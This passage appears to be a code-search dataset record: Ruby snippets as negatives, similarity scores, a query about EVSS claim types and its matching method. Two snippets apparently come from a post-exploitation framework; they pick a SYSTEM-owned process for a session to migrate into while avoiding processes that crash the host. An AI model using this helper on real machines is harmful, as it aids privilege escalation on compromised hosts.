"def scrape\n articles = []\n url = 'http://feeds.news.com.au/heraldsun/rss/heraldsun_news_sport_2789.xml'\n\n open(url) do |rss|\n feed = RSS::Parser.parse(rss)\n feed.items.each do |item|\n articles << (interpret item)\n end\n end\n articles\n end",
"def allfeedseen\n\t\tusernews = News.where(:targetuser_id => current_user.id).all\n\t\tusernews.update_all(:seen => 1);\n\t\tusernews.order('created_at DESC').offset(20).destroy_all\n\n\t\trespond_to do |format|\n format.json { render json: {} , status: 200 }\n end\n\tend",
"def set_news\n @news = News.friendly.find(params[:id])\n end",
"def set_newsinfo\n @newsinfo = Newsinfo.find(params[:id])\n end",
"def index\n @api_v1_news_links = Api::V1::NewsLink.all\n end",
"def set_news\n\t\t@news = News.find(params[:id])\n\tend",
"def set_news\n @news = News.unscoped.find(params[:id])\n end",
"def update\n if @news.update_attributes(news_params)\n render json: @news, status: :ok\n else\n render json: {message: \"Not found\"}, status: :not_found\n end\n end",
"def set_news\n @news = News.find(params[:id])\n puts @news\n end",
"def feed\n @posts = Post.feed_of(params[:id])\n end",
"def _state_news(state_id)\n get('state/news', state_id, options: { type: :array })\n end",
"def index\n @feed_infos = FeedInfo.all\n end",
"def feed\n @blog_articles = BlogArticle.all\n respond_to do |format|\n format.rss { render layout: false }\n end\n end",
"def index\n @api_v1_news_link_comments = Api::V1::NewsLinkComment.all\n end",
"def fetch\n options = {:on_success => method(:success), :on_failure => method(:failure), :timeout => 30}\n feed = Feedzirra::Feed.fetch_and_parse(self.feed_url, options)\n rescue Exception => e\n puts \"Failure fetching feed: #{e.message}\" \n end",
"def set_news_source\n @news_source = NewsSource.find(params[:id])\n end",
"def update\n @news_agency = NewsAgency.find(params[:id])\n\n respond_to do |format|\n if @news_agency.update_attributes(params[:news_agency])\n format.html { redirect_to @news_agency, notice: 'News agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @news_hits = NewsHit.all\n end",
"def fetch\n headers = {\n \"User-Agent\" => \"#{HTTP::Request::USER_AGENT} (rubyland aggregator)\"\n }\n\n unless refresh == :hard\n if db_feed.http_etag\n headers[\"If-None-Match\"] = db_feed.http_etag\n end\n if db_feed.http_last_modified\n headers['If-Modified-Since'] = db_feed.http_last_modified\n end\n end\n\n # Loop redirects, marking new permanent url if all 304s\n tries = 0\n fetch_url = feed_url\n new_url = nil\n response = nil\n permanent_new_url = nil\n all_301s = true\n\n while tries < max_redirects\n tries += 1\n response = HTTP.use(:auto_inflate).headers(headers).get(fetch_url)\n\n if HTTP::Redirector::REDIRECT_CODES.include? response.status\n if response.status != 301\n all_301s = false\n end\n fetch_url = response.headers[\"Location\"]\n else\n break\n end\n end\n\n return response, (tries > 1 && all_301s ? fetch_url : nil)\n end"
] | [
"0.7513578",
"0.68720174",
"0.68716896",
"0.6681916",
"0.6586323",
"0.6517632",
"0.6508943",
"0.6480259",
"0.64605004",
"0.6435497",
"0.6354102",
"0.6225285",
"0.62074596",
"0.61961514",
"0.61918014",
"0.61565053",
"0.61554474",
"0.61537933",
"0.6133251",
"0.6123011",
"0.61040646",
"0.60741955",
"0.6051198",
"0.60478795",
"0.60367537",
"0.60222876",
"0.60211647",
"0.59878343",
"0.59760165",
"0.59730506",
"0.596795",
"0.59661406",
"0.5938717",
"0.5918977",
"0.59171444",
"0.5916352",
"0.5903021",
"0.5902748",
"0.5888901",
"0.586886",
"0.5866907",
"0.5866307",
"0.5856966",
"0.5856966",
"0.5856966",
"0.5841115",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834031",
"0.58265585",
"0.58170056",
"0.5813806",
"0.5807251",
"0.5807212",
"0.5801951",
"0.57945853",
"0.5793189",
"0.5787303",
"0.5770508",
"0.57486945",
"0.57421833",
"0.5736311",
"0.5735325",
"0.57267725",
"0.57222074",
"0.5717165",
"0.57168895",
"0.5714966",
"0.5712047",
"0.5711885",
"0.5710832",
"0.5701092",
"0.569737",
"0.5678862",
"0.56721663",
"0.5663583",
"0.56611675",
"0.5659657",
"0.565887",
"0.5658662",
"0.56560695",
"0.5627932",
"0.5625654",
"0.56242466",
"0.56230956",
"0.56209266",
"0.5618116",
"0.5617146",
"0.56168556"
] | 0.81743777 | 0 |
returns "STANDARD_CLAIM_PROCESS", "BDD_PROGRAM", or "FDC_PROGRAM" based off of a few attributes in the evss data | def evss_claims_process_type(form526)
if form526['bddQualified']
return 'BDD_PROGRAM'
elsif form526['standardClaim']
return 'STANDARD_CLAIM_PROCESS'
end
'FDC_PROGRAM'
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_system(code)\n return code[2][1][0][1][1][1]\n end",
"def proc_name\n data = read_cpuinfo.match(/model name\\s*:\\s*(.+)/)[1]\n\n return data.strip\n end",
"def getSecurityEvent( event_id )\r\n\r\nputs case event_id\r\nwhen 4608 \r\n return \"Startup\"\r\nwhen 4609 \r\n return \"Shutdown\"\r\n#when 4624 \r\n# return \"Logon\"\r\n#when 4634 \r\n# return \"Logoff\"\r\nwhen 4800 \r\n return \"Lock\"\r\nwhen 4801 \r\n return \"Un-lock\"\r\nwhen 4802 \r\n return \"Screensaver Start\"\r\nwhen 4803\r\n return \"Screensaver End\"\r\nelse\r\n return nil\r\nend\t\r\n\r\nend",
"def pc_system_type_decode(type)\n case type\n when 4 then \"Enterprise Server\" # most likely so first\n when 0 then \"Unspecified\"\n when 1 then \"Desktop\"\n when 2 then \"Mobile\"\n when 3 then \"Workstation\"\n when 5 then \"SOHO Server\"\n when 6 then \"Appliance PC\"\n when 7 then \"Performance Server\"\n when 8 then \"Maximum\"\n end\n end",
"def parse_oleprocinfo(proc_info)\n\t\tcommand = proc_info.Name\n\t\tpid = proc_info.ProcessId\n\t\tuid = 0\n\t\tcmdline = proc_info.CommandLine\n\t\trss = proc_info.MaximumWorkingSetSize\n\t\ttime = proc_info.KernelModeTime.to_i + proc_info.UserModeTime.to_i\n\n\t\t{\n\t\t\t:pid => pid,\n\t\t\t:uid => uid,\n\t\t\t:command => command,\n\t\t\t:cmdline => cmdline,\n\t\t\t:mem => rss,\n\t\t\t:cpu => time,\n\t\t}\n\tend",
"def parse_oleprocinfo(proc_info)\n\t\tcommand = proc_info.Name\n\t\tpid = proc_info.ProcessId\n\t\tuid = 0\n\t\tcmdline = proc_info.CommandLine\n\t\trss = proc_info.MaximumWorkingSetSize\n\t\ttime = proc_info.KernelModeTime.to_i + proc_info.UserModeTime.to_i\n\n\t\t{\n\t\t\t:pid => pid,\n\t\t\t:uid => uid,\n\t\t\t:command => command,\n\t\t\t:cmdline => cmdline,\n\t\t\t:mem => rss,\n\t\t\t:cpu => time,\n\t\t}\n\tend",
"def composite_med_proc_id\n elem = []\n if ((!cpt_code.blank? and !revenue_code.blank?)|| revenue_code.blank?)\n proc_code = \"HC:#{cpt_code}\"\n else\n proc_code = \"NU:#{revenue_code}\"\n end\n\n # proc_code = ((!cpt_code.blank? and !revenue_code.blank?) || revenue_code.blank?) ? \"HC:#{cpt_code}\" : \"NU:#{revenue_code}\"\n elem = [proc_code, service.service_modifier1 , service.service_modifier2 ,\n service.service_modifier3 , service.service_modifier4]\n elem = Output835.trim_segment(elem)\n elem.join(':')\n end",
"def service_prov_identification\n code, qual = nil, nil\n claim = eob.claim_information\n\n if (claim && !claim.provider_npi.blank?)\n code = claim.provider_npi\n qual = 'XX'\n Output835.log.info \"Provider NPI from the 837 is chosen\"\n elsif (claim && !claim.provider_ein.blank?)\n code = claim.provider_ein\n qual = 'FI'\n Output835.log.info \"Provider TIN from 837 is chosen\"\n elsif !facility.facility_npi.blank?\n code = facility.facility_npi\n qual = 'XX'\n Output835.log.info \"facility NPI from FC is chosen\"\n elsif !facility.facility_tin.blank?\n code = facility.facility_tin\n qual = 'FI'\n Output835.log.info \"facility TIN from FC is chosen\"\n end\n\n return code, qual\n end",
"def explain_application_info(org_text)\n retval = {} # Default\n return retval unless org_text\n\n if org_text.match('Application = ')\n appl = SyspApplication.get_cached_instance(org_text.split(' ')[2].to_i)\n if appl\n retval[:short_info] = appl.name\n retval[:long_info] = \"#{appl.description} >> Team: #{appl.developmentteam.name}\"\n else\n retval[:short_info] = \"Application not found for #{org_text}\"\n end\n end\n\n if org_text.match('ID_WSMethod = ')\n ws = Wsmethod.get_cached_instance(org_text.split(' ')[2].to_i)\n if ws\n retval[:short_info] = ws.name\n retval[:long_info] = \"#{ws.name}\"\n else\n retval[:short_info] = \"WSMethod not found for #{org_text}\"\n end\n end\n\n if org_text.match('ID_OFMsgType = ')\n mt = Ofmessagetype.get_cached_instance(org_text.split(' ')[2].to_i, session[:database].hash)\n if mt\n retval[:short_info] = mt.name\n retval[:long_info] = \"#{mt.description} >> Domain: #{mt.domain.name}\"\n else\n retval[:short_info] = \"OFMessagetype not found for #{org_text}\"\n end\n end\n\n\n\n retval\n end",
"def value\n cmd = \"#{resource[:tunable]}\"\n case cmd\n when 'schedo'\n schedo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'vmo'\n vmo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'ioo'\n ioo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'lvmo'\n lvmo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'no'\n no('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'nfso'\n nfso('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n end\n end",
"def auditString\n\t\tif(!self.blob.nil?)\n\t\t\tblobData = JSON.parse(self.blob, {:symbolize_names => true})\n\t\tend\n\n\t\treturn case self.event_type\n\t\twhen EVENT_TYPE::PROV_PASS_REQUEST then \"Provisional Pass requested\"\n\t\twhen EVENT_TYPE::PROV_PASS_APPROVE then \"Provisional Pass approved\"\n\t\twhen EVENT_TYPE::PROV_PASS_DENY then \"Provisional Pass denied\"\n\t\twhen EVENT_TYPE::PROV_PASS_REQCANCEL then \"Provisional Pass request cancelled\"\n\t\twhen EVENT_TYPE::ADMIN_OVERRIDE_PRIVATE_APP then \"Private app view restrictions overridden\"\n\t\twhen EVENT_TYPE::ADMIN_OVERRIDE_PRIVATE_TEST then \"Private test view restrictions overridden\"\n\t\twhen EVENT_TYPE::APP_CREATE then \"App created\"\n\t\twhen EVENT_TYPE::APP_RENAME then \"App renamed <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::APP_LINK then \"App linked to EID #{Rack::Utils::escape_html(self.target_b)} (#{Rack::Utils::escape_html(self.details_txt)})\"\n\t\twhen EVENT_TYPE::APP_UNLINK then \"App unlinked from EID #{Rack::Utils::escape_html(self.target_b)}\"\n\t\twhen EVENT_TYPE::APP_MADE_GLOBAL then \"App marked <b>global</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_NOTGLOBAL then \"App marked <b>not global</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_PRIVATE then \"App marked <b>private</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_NOTPRIVATE then \"App marked <b>not private</b>\"\n\t\twhen EVENT_TYPE::APP_RTCHANGE then \"Changed app RecordType <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::APP_GEO_SET then \"Set app geo to <b>#{geoToString(blobData[:geoId])}</b>\"\n\t\twhen EVENT_TYPE::APP_DELETE then \"App deleted\"\n\t\twhen EVENT_TYPE::APP_FLAG_ADD then \"App flagged with <b>#{Rack::Utils::escape_html(blobData[:flagName])}</b>\"\n\t\twhen EVENT_TYPE::APP_FLAG_REM then \"App flag <b>#{Rack::Utils::escape_html(blobData[:flagName])}</b> removed\"\n\t\twhen EVENT_TYPE::APP_OWNER_ASSIGN then \"App owner set to <b>#{Rack::Utils::escape_html(blobData[:userName])}</b>\"\n\t\twhen EVENT_TYPE::TEST_CREATE then \"Test created\"\n\t\twhen EVENT_TYPE::TEST_RENAME then \"Test renamed <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::TEST_REVIEWER_UNASSIGNED then \"Reviewer (<b>#{Rack::Utils::escape_html(blobData[:userName])}</b>) unassigned\"\n\t\twhen EVENT_TYPE::TEST_REVIEWER_ASSIGNED then \"Reviewer (<b>#{Rack::Utils::escape_html(blobData[:userName])}</b>) assigned\"\n\t\twhen EVENT_TYPE::TEST_INPROG then \"Test in progress\"\n\t\twhen EVENT_TYPE::TEST_PASS_REQ_APPROVAL then \"Test passed pending approval\"\n\t\twhen EVENT_TYPE::TEST_PASS then \"<b>Test passed</b> and closed\"\n\t\twhen EVENT_TYPE::TEST_FAIL_REQ_APPROVAL then \"Test failed pending approval\"\n\t\twhen EVENT_TYPE::TEST_FAIL then \"<b>Test failed</b> and closed\"\n\t\twhen EVENT_TYPE::TEST_DELETE then \"Test deleted\"\n\t\twhen EVENT_TYPE::USER_LOGIN then \"User successfully logged in via #{blobData[:type]}\"\n\t\twhen EVENT_TYPE::USER_LOGIN_FAILURE then \"User login failed via #{blobData[:type]}\"\n\t\telse \"UNK\"\n\t\tend\n\tend",
"def get_event_type(code, params)\n type = EVENT_COMMAND_CODES[code]\n\n # Control variables can be assigned scripts:\n if code == 122 and params[3] == 4 then\n type[1] = true\n end\n\n type.nil? ? [code, false] : type\nend",
"def get_system_proc\r\n\t\t# Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n\t\tlocal_sys = resolve_sid(\"S-1-5-18\")\r\n\t\tsystem_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n\t\t# Processes that can Blue Screen a host if migrated in to\r\n\t\tdangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n\t\tsession.sys.process.processes.each do |p|\r\n\t\t\t# Check we are not migrating to a process that can BSOD the host\r\n\t\t\tnext if dangerous_processes.include?(p[\"name\"])\r\n\t\t\tnext if p[\"pid\"] == session.sys.process.getpid\r\n\t\t\tnext if p[\"pid\"] == 4\r\n\t\t\tnext if p[\"user\"] != system_account_name\r\n\t\t\treturn p\r\n\t\tend\r\n\tend",
"def parse_program(prog)\n prog_bytes = to_bytes(prog)\n data = {}\n raise \"Invalid program\" unless prog[0, 4] == 'PROG'\n name = prog[4...16]\n data[:name] = program_name(prog)\n\n HR_PARAMS.each do |(key, ms_offset, ls_offset, ls_pos, units)|\n # single byte value\n value = prog_bytes[ms_offset]\n data[key] = value\n # high resolution value\n value_hr = (value << 2) | ((prog_bytes[ls_offset] >> ls_pos) & 0x03)\n data[:\"#{key}_hr\"] = value_hr\n if units\n # converted value:\n data[:\"#{key}_#{units}\"] = CONVERTERS[units][value_hr]\n end\n end\n\n CONV_PARAMS.each do |(key, offset, bit_pos, bit_len, units)|\n value = bits(prog_bytes[offset], bit_pos, bit_len)\n data[key] = CONVERTERS[units][value]\n if value != data[key]\n data[:\"#{key}_value\"] = value\n end\n end\n\n data[:seq_notes] = (96..426).step(22).map{|offset| note_name prog_bytes[offset]}\n (data[:step_length]...data[:seq_notes].size).each do |i|\n data[:seq_notes][i] = ''\n end\n # puts data[:seq_notes].join(' ')\n\n data[:lfo_rate_vis] = data[:lfo_bpm_sync] == 'ON' ? data[:lfo_rate_bpm] : data[:lfo_rate_hr]\n data[:eg_int_abs] = data[:eg_int_signed].abs\n data[:lfo_int_abs] = data[:lfo_int_signed].abs\n data\nend",
"def program_name(qc_inspection_type_code)\n ProgramFunction.generic_program_name( 'QC', qc_inspection_type_code )\n end",
"def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end",
"def attribute_string\n s = []\n s << \"PROGRAM-ID=#{ (program_id || 1).to_i }\"\n s << \"BANDWIDTH=#{ bandwidth.to_i }\"\n s << \"CODECS=\\\"#{ codecs }\\\"\" if codecs\n s << \"RESOLUTION=#{ resolution }\" if resolution\n s.join(',')\n end",
"def get_pt_type(device)\n fs_check = Mixlib::ShellOut.new(\"blkid -c /dev/null #{device}\")\n fs_check.run_command\n match = fs_check.stdout.match(/\\sPTTYPE=\\\"(.*?)\\\"/)\n match = '' if match.nil?\n\n Chef::Log.info(\"Partition type for device #{device}: #{match[1]}\")\n match[1]\nend",
"def service_payee_identification\n code, qual = nil, nil\n claim = eob.claim_information\n fac = facility\n\n if (claim && !claim.payee_npi.blank?)\n code = claim.payee_npi\n qual = 'XX'\n Output835.log.info \"Payee NPI from the 837 is chosen\"\n elsif (claim && !claim.payee_tin.blank?)\n code = claim.payee_tin\n qual = 'FI'\n Output835.log.info \"Payee TIN from 837 is chosen\"\n elsif !fac.facility_npi.blank?\n code = fac.facility_npi\n qual = 'XX'\n Output835.log.info \"facility NPI from FC is chosen\"\n elsif !fac.facility_tin.blank?\n code = fac.facility_tin\n qual = 'FI'\n Output835.log.info \"facility TIN from FC is chosen\"\n end\n\n return code, qual\n end",
"def get_event_type_for_csi_entry\n event_type ? get_event_type_separated.gsub('MI', 'MX') : '?'\n end",
"def compare_sdc\n @attribute_all.each{|attribute_name,attribute_data|\n case attribute_name\n when \"define_clock\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Signal_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == attribute_name && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n when \"xc_pulldown\", \"xc_pullup\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Pin_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == \"define_attribute\" && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n when \"syn_keep\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Pin_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == \"define_attribute\" && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n end\n }\n end",
"def schema\n {\n 'AM'\t=> 'Segment Identification',\n 'EY'\t=> 'Provider ID Qualifier',\n 'E9'\t=> 'Provider ID' }\n end",
"def types\n\t\t\t\tlist.reduce({}) { |h, x|\n\t\t\t\t\tbegin\n\t\t\t\t\t\th.merge!(x =>\n\t\t\t\t\t\t\tcase IO.read(File.join('/proc', x.to_s, 'stat')).split[2]\n\t\t\t\t\t\t\t\twhen ?S.freeze then :sleeping\n\t\t\t\t\t\t\t\twhen ?I.freeze then :idle\n\t\t\t\t\t\t\t\twhen ?Z.freeze then :zombie\n\t\t\t\t\t\t\t\twhen ?R.freeze then :running\n\t\t\t\t\t\t\t\telse :unknown\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t)\n\t\t\t\t\trescue Exception\n\t\t\t\t\t\th\n\t\t\t\t\tend\n\t\t\t\t}\n\t\t\tend",
"def program_name?\n\t\"diagnostics\"\n end",
"def get_tenant_and_evs_name()\n usrstr = @resource[:name].split(\"/\")\n if usrstr.length == 2\n return usrstr[0], usrstr[1]\n else\n fail \"Invalid EVS name #{@resource[:name]} \\n\" \\\n \"Name convention must be <tenant>/<evs>\"\n end\n end",
"def get_os\n system=`/usr/bin/sw_vers -productVersion`.chomp.split(\".\").slice(1).to_i\n if system==4 then\n return \"tiger\"\n else\n return \"leo\"\n end\nend",
"def service_prov_name\n Output835.log.info \"Printing NM1*82 for Patient Acc Num : #{eob.patient_account_number}\"\n prov_id, qualifier = service_prov_identification\n service_prov_name_elements = []\n service_prov_name_elements << 'NM1'\n service_prov_name_elements << '82'\n service_prov_name_elements << (eob.rendering_provider_last_name.to_s.strip.blank? ? '2': '1')\n service_prov_name_elements << prov_last_name_or_org\n service_prov_name_elements << eob.rendering_provider_first_name\n service_prov_name_elements << eob.rendering_provider_middle_initial\n service_prov_name_elements << ''\n service_prov_name_elements << eob.rendering_provider_suffix\n service_prov_name_elements << qualifier\n service_prov_name_elements << prov_id\n service_prov_name_elements = Output835.trim_segment(service_prov_name_elements)\n service_prov_name_elements.join(@element_seperator)\n end",
"def ace_type_string\n case @ace_type\n when 0x0\n 'ACCESS_ALLOWED_ACE_TYPE'\n when 0x1\n 'ACCESS_DENIED_ACE_TYPE'\n when 0x2\n 'SYSTEM_AUDIT_ACE_TYPE'\n when 0x3\n 'SYSTEM_ALARM_ACE_TYPE'\n when 0x4\n 'ACCESS_ALLOWED_COMPOUND_ACE_TYPE'\n when 0x5\n 'ACCESS_ALLOWED_OBJECT_ACE_TYPE'\n when 0x6\n 'ACCESS_DENIED_OBJECT_ACE_TYPE'\n when 0x7\n 'SYSTEM_AUDIT_OBJECT_ACE_TYPE'\n when 0x8\n 'SYSTEM_ALARM_OBJECT_ACE_TYPE'\n when 0x9\n 'ACCESS_ALLOWED_CALLBACK_ACE_TYPE'\n when 0xA\n 'ACCESS_DENIED_CALLBACK_ACE_TYPE'\n when 0xB\n 'ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE'\n when 0xC\n 'ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE'\n when 0xD\n 'SYSTEM_AUDIT_CALLBACK_ACE_TYPE'\n when 0xE\n 'SYSTEM_ALARM_CALLBACK_ACE_TYPE'\n when 0xF\n 'SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE'\n when 0x10\n 'SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE'\n end\n end",
"def determine_class_data_for(mailClass)\n\t\tif mailClass == 'FC'\n\t\t\treturn '10' #Code for First Class Mail\n\t\telsif mailClass == 'PM' or mailClass == 'CM'\n\t\t\treturn '20' #Code for Priority Mail\n\t\telsif mailClass == 'S2'\n\t\t\treturn '40' #Code for Standard\n\t\telsif mailClass == 'SA'\n\t\t\treturn '90' #Code for Standard Non-Profit\n\t\telsif mailClass == 'CP'\n\t\t\treturn '7G' #Code for Priority Mail International\n\t\telsif mailClass == 'LC'\n\t\t\treturn '7K' #Code for FCPIS\n\t\telsif mailClass == 'PG' or mailClass == 'IE'\n\t\t\treturn '70' #Code for GxG or EMI\n\t\telsif mailClass == 'BB'\n\t\t\treturn '52' #Code for Bound Printed Matter\n\t\telsif mailClass == 'BL'\n\t\t\treturn '54' #Code for Library Mail\n\t\telsif mailClass == 'BS'\n\t\t\treturn '53' #Code for Media Mail\n\t\telsif mailClass == 'RP'\n\t\t\treturn '5I' #Code for PRS\n\t\telsif mailClass == 'PS' or mailClass == 'LW'\n\t\t\treturn '5H' #Code for Parcel Select\n\t\telse\n\t\t\treturn '50' #Package Services Default\n\t\tend\n\tend",
"def service_prov_name\n Output835.log.info \"Printing NM1*82 for Patient Acc Num : #{eob.patient_account_number}\"\n prov_id, qualifier = service_prov_identification\n service_prov_name_elements = []\n service_prov_name_elements << 'NM1'\n service_prov_name_elements << '82'\n service_prov_name_elements << (eob.rendering_provider_last_name.strip.blank? ? '2': '1')\n service_prov_name_elements << prov_last_name_or_org\n service_prov_name_elements << eob.rendering_provider_first_name\n service_prov_name_elements << eob.rendering_provider_middle_initial\n service_prov_name_elements << ''\n service_prov_name_elements << ''\n service_prov_name_elements << qualifier\n service_prov_name_elements << prov_id\n service_prov_name_elements = Output835.trim_segment(service_prov_name_elements)\n service_prov_name_elements.join(@element_seperator)\n end",
"def user_os_complex\r\n end",
"def program\n ::HubEdos::Common::Reference::Descriptor.new(@data['program']) if @data['program']\n end",
"def process_tokens(parts)\n # defaults/fallbacks\n type = 'system'\n action = 'event'\n\n parts.each do |token|\n if token.in? MODELS_WITH_EVENTS\n type = token\n elsif token[0..4].in? COMMON_EVENT_PREFIXES\n action = token\n end\n end\n\n return type, action\n end",
"def commandtype(line)\n case line\n when /^@/\n return \"A_COMMAND\"\n when /^\\w*=/\n return \"C_COMMAND\"\n when /^*;/\n return \"C_COMMAND\"\n when /^*\\(/\n return \"L_COMMAND\"\n end\n end",
"def get_program_def(name:)\n PROGRAMS[name]\n end",
"def system_class\n virt = node.virtualization\n if virt[:role]\n if virt[:role] == \"guest\" && virt[:system] == \"xen\"\n return \"xen-guest\"\n elsif virt[:role] == \"host\" && virt[:system] == \"xen\"\n return \"xen-host\"\n else\n return \"unknown-vm\"\n end\n else\n return \"hardware\"\n end\nend",
"def get_metrics_string(machine_name,product,type,studio_name)\n base_prefix = \"GRAPH-studio_global_\";\n base_suffix = \"\";\n if type==\"machine\" \n base_suffix = \"_retouch_v1.RESULT-\";\n elsif type == \"studio\"\n base_suffix = \"_retouch_v1.STUDIO-\" + studio_name;\n base_suffix += \".RESULT-\";\n end \n verdicts = product==\"apparel\" ? [\"ACCEPT\",\"PARTIAL_RESULT\",\"NO_RESULT\",\"REJECT\"] : [\"ACCEPT\",\"PARTIAL_RESULT\",\"NO_RESULT\",\"REJECT\",\"ERROR\"];\n base_prefix += product + \"_\";\n\n metricsname_list = [];\n for j in 0..verdicts.size-1\n metricsname_list.push(base_prefix+machine_name+base_suffix+verdicts[j]);\n end\n return metricsname_list;\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : (data_import_meeting_program ? data_import_meeting_program.event_type.i18n_short : '?')\n end",
"def get_event_type(code)\n type = EVENT_COMMAND_CODES[code]\n type.nil? ? [code, false] : type\nend",
"def [](process_name)\n if process_name.include? '.'\n select { |process| process.type == process_name }\n else\n select { |process| process.process == process_name }.first\n end\n end",
"def determine_event(group)\n case group\n when /_PregScreen_/\n PREGNANCY_SCREENER_EVENT\n when /Telephone/\n TELEPHONE_INTERVIEW_EVENT\n when /Text Message/\n TELEPHONE_INTERVIEW_EVENT\n when /Mail/\n MAILED_BACK_SAQ_EVENT\n when /_SAQ_/\n MAILED_BACK_SAQ_EVENT\n when /_HHEnum_/\n HOUSEHOLD_ENUMERATION_EVENT\n else\n GENERAL_STUDY_VISIT_EVENT\n end\n end",
"def resource_type_from_document(document)\n resource_type = \"\"\n\n #type_ssi\n #resource_type = document[\"format_ssi\"] unless document[\"format_ssi\"].nil?\n resource_type = document[\"format_ssi\"] || document[\"type_ssi\"]\n resource_type = resource_type.is_a?(Array) ? resource_type.first : resource_type\n end",
"def resource_type_from_document(document)\n resource_type = \"\"\n\n #type_ssi\n #resource_type = document[\"format_ssi\"] unless document[\"format_ssi\"].nil?\n resource_type = document[\"format_ssi\"] || document[\"type_ssi\"]\n resource_type = resource_type.is_a?(Array) ? resource_type.first : resource_type\n end",
"def reg_type\n attributes['reg_type'].downcase\n end",
"def get_os\n line = Cocaine::CommandLine.new('uname')\n output = line.run\n\n output.chomp.downcase.intern\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : '?'\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : '?'\n end",
"def availability_and_consultation_modes\n\t\thuman_attribute_names_if_present *(CONSULTATION_MODES + [:consult_remotely, :accepting_new_clients])\n\tend",
"def get_pdf_attributes_app_name()\n app_name = \"PDF Attributes\"\n return app_name\nend",
"def oem_name\n @values.fetch('ai.device.oemName') { \n @values['ai.device.oemName'] = nil\n }\n end",
"def get_device_info()\n @errors = []\n info = {}\n return info unless @programmer_path\n\n response = IO.popen(\"#{@programmer_path} I\").readlines\n puts response if $debug\n response.each do |line|\n if line =~ /Error/i\n errors << line\n else\n parts = line.split(/:|\\.\\.\\./)\n info[parts[0].strip.split.join.to_sym] = parts[1].strip if parts.size == 2\n end\n end # each\n info\n end",
"def service_prov_name(eob = nil,claim = nil )\n @eob = @eob.nil?? eob : @eob\n prov_id, qualifier = service_prov_identification\n ['NM1', '82', (@eob.rendering_provider_last_name.to_s.strip.blank? ? '2': '1'),\n prov_last_name_or_org, @eob.rendering_provider_first_name,\n @eob.rendering_provider_middle_initial, '', @eob.rendering_provider_suffix,\n qualifier, prov_id].trim_segment.join(@element_seperator)\n end",
"def scsb_request_map(request_type)\n if request_type == 'edd'\n 'EDD'\n else\n 'RETRIEVAL' # Default is print retrieval\n end\n end",
"def weams_type\n { \n 'ojt' => ojt?, 'correspondence' => correspondence?, 'flight' => flight?,\n 'foreign' => foreign?, 'public' => public?, 'for profit' => for_profit?,\n 'private' => private?\n }.find { |key, value| value }[0]\n end",
"def get(argvs)\n return nil unless argvs\n return nil unless argvs.is_a? Sisimai::Data\n return argvs.reason if argvs.reason.size > 0\n\n statuscode = argvs.deliverystatus\n statusmesg = argvs.diagnosticcode\n reasontext = ''\n\n CodeTable.each_key do |e|\n # Try to match with each regular expression of delivery status codes\n next unless statuscode =~ e\n CodeTable[e].each do |f|\n # Try to match with each regular expression of error messages\n next unless statusmesg =~ f[:regexp]\n reasontext = f[:reason]\n break\n end\n end\n\n return reasontext\n end",
